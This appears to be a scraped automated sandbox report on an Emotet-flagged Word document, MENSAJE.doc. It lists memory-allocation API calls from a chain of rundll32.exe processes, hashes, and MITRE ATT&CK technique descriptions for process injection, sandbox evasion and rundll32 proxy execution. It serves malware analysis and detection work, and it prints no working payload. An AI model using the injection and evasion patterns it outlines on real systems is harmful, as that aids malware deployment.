Instruction Fuzzy Hash: 60110060D082C9EEEB01D7E894097FFBFB55F11704F044098D6456A282D6BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 912 Parent PID: 2936 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 001B0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001B0575
UnmapViewOfFile.KERNELBASE(?), ref: 001B0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001B063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001B0770

Memory Dump Source

Source File: 0000000C.00000002.2152551863.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_190000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 6a72f608d7bbab66b13f6aad8eb04a3b540f84f2e9f230965b502c1cb9fc0ba8
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: E5B199B4E001099FCB48CF89C591AAEB7B5BF88304F208159E915AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001AFFD4

Strings

VirtualAlloc, xrefs: 001AFFB9, 001AFFBC

Memory Dump Source

Source File: 0000000C.00000002.2152551863.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_190000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: a896ef7e8d8734a45e50ba1b6c3b63a4ccc1cc504e587fe0f7c18d041913a3b7
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C3113060D08289DEEB01D7E888097EFBFB55B21704F044098E6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2312 Parent PID: 912 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
UnmapViewOfFile.KERNELBASE(?), ref: 00190625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770

Memory Dump Source

Source File: 0000000D.00000002.2163033986.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_170000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4

Strings

VirtualAlloc, xrefs: 0018FFB9, 0018FFBC

Memory Dump Source

Source File: 0000000D.00000002.2163033986.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_170000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2848 Parent PID: 2312 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
UnmapViewOfFile.KERNELBASE(?), ref: 00190625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770

Memory Dump Source

Source File: 0000000E.00000002.2173508034.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4

Strings

VirtualAlloc, xrefs: 0018FFB9, 0018FFBC

Memory Dump Source

Source File: 0000000E.00000002.2173508034.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3032 Parent PID: 2848 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 001B0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001B0575
UnmapViewOfFile.KERNELBASE(?), ref: 001B0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001B063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001B0770

Memory Dump Source

Source File: 0000000F.00000002.2185719006.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_190000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 6a72f608d7bbab66b13f6aad8eb04a3b540f84f2e9f230965b502c1cb9fc0ba8
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: E5B199B4E001099FCB48CF89C591AAEB7B5BF88304F208159E915AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001AFFD4

Strings

VirtualAlloc, xrefs: 001AFFB9, 001AFFBC

Memory Dump Source

Source File: 0000000F.00000002.2185719006.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_190000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: a896ef7e8d8734a45e50ba1b6c3b63a4ccc1cc504e587fe0f7c18d041913a3b7
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C3113060D08289DEEB01D7E888097EFBFB55B21704F044098E6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 620 Parent PID: 3032 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
UnmapViewOfFile.KERNELBASE(?), ref: 00190625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770

Memory Dump Source

Source File: 00000010.00000002.2195812425.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_170000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4

Strings

VirtualAlloc, xrefs: 0018FFB9, 0018FFBC

Memory Dump Source

Source File: 00000010.00000002.2195812425.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_170000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2368 Parent PID: 620 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00230530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00230575
UnmapViewOfFile.KERNELBASE(?), ref: 00230625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0023063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00230770

Memory Dump Source

Source File: 00000011.00000002.2205448616.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_210000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: adf6f3cc4832c56444c6b94731e8ac7bab03accd4048f4b6fbc70afd8c189439
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DDB198B4E10109DFCB48CF84C591AAEB7B5BF88304F208159E919AB355D735EE92CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0022FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0022FFD4

Strings

VirtualAlloc, xrefs: 0022FFB9, 0022FFBC

Memory Dump Source

Source File: 00000011.00000002.2205448616.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_210000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 24cfe8d407d244fba926ef3a4865cb122934473a5ec65787b5f554f94fac5dcc
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 041130A0D0828DEEEB01D7E894497EFBFB55B11704F044098D6446A282D2BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 948 Parent PID: 2368 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 002D0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 002D0575
UnmapViewOfFile.KERNEL32(?), ref: 002D0625
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 002D063F
VirtualProtect.KERNEL32(?,?,00000000), ref: 002D0770

Memory Dump Source

Source File: 00000012.00000002.2336386642.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2b0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 94e4f11c3f36d0ca10db94fb9d81a332d6b3c607857f5b4ec5e3b9bd28eed85f
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 31B198B4E00109DFCB48CF84C591AAEB7B5BF88304F208159E919AB355D735EE92CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002CFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 002CFFD4

Strings

VirtualAlloc, xrefs: 002CFFB9, 002CFFBC

Memory Dump Source

Source File: 00000012.00000002.2336386642.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2b0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8cdd9676573ad9833f852e2180f53f286d5b50052f8909f548ab85cc82ca4364
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 5B111260D082CDDEEF01D7E8D409BEFBFB55F11704F044098D6456B282D6BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MENSAJE.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MENSAJE.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Nre_13r__v1meabhr2, Stream Size: 1121

General

VBA Code Keywords

VBA Code

VBA File Name: Twwejh034u32ebq, Stream Size: 701

General

VBA Code Keywords

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre